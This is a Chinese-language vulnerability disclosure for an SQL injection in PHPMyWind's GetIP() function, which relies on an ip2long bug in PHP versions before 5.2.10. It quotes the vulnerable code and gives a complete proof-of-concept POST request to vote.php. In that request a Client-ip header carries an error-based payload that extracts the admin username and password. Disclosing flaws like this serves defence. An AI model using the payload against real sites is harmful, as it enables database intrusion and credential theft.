PHPMyWind一处注入（鸡肋）

### 简要描述： sql注射。 ### 详细说明： include\common.func.php: ``` function GetIP() { static $ip = NULL; if($ip !== NULL) return $ip; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $arr = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $pos = array_search('unknown',$arr); if(false !== $pos) unset($arr[$pos]); $ip = trim($arr[0]); } else if(isset($_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP']; } else if(isset($_SERVER['REMOTE_ADDR'])) { $ip = $_SERVER['REMOTE_ADDR']; } //IP地址合法验证 $ip = (false !== ip2long($ip)) ? $ip : '0.0.0.0'; //在低版本的php中ip2long有个bug，利用此bug可以绕过此处IP检查，进行sql注射 return $ip; } ``` 相关链接: http://www.securityfocus.com/archive/1/archive/1/441529/100/100/threaded 2009年4月29日修复：http://git.php.net/?p=php-src.git;a=commit;h=1e09a216e4ed789b497a116140ae0a2a066f66ef 影响范围： 针对php <5.2.10 的版本 （鸡肋原因） ### 漏洞证明： 数据包中在1.2.3.4后面跟一个TAB: ``` POST /PHPMyWind/vote.php?id=1 HTTP/1.1 Host: localhost Connection: keep-alive Content-Length: 35 Content-Type: application/x-www-form-urlencoded Client-ip: 1.2.3.4 ' or @`'` AND ( SELECT 1 FROM (SELECT count(1),concat(round(rand(0)),(SELECT concat(username,0x23,password) FROM pmw_admin LIMIT 0,1))a FROM information_schema.tables GROUP by a)b) or @`'` and ''=' options%5B%5D=1&voteid=1&action=add ``` [<img src="https://images.seebug.org/upload/201410/301554453731dbb6368266266c8115bffe4233bf.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/301554453731dbb6368266266c8115bffe4233bf.png)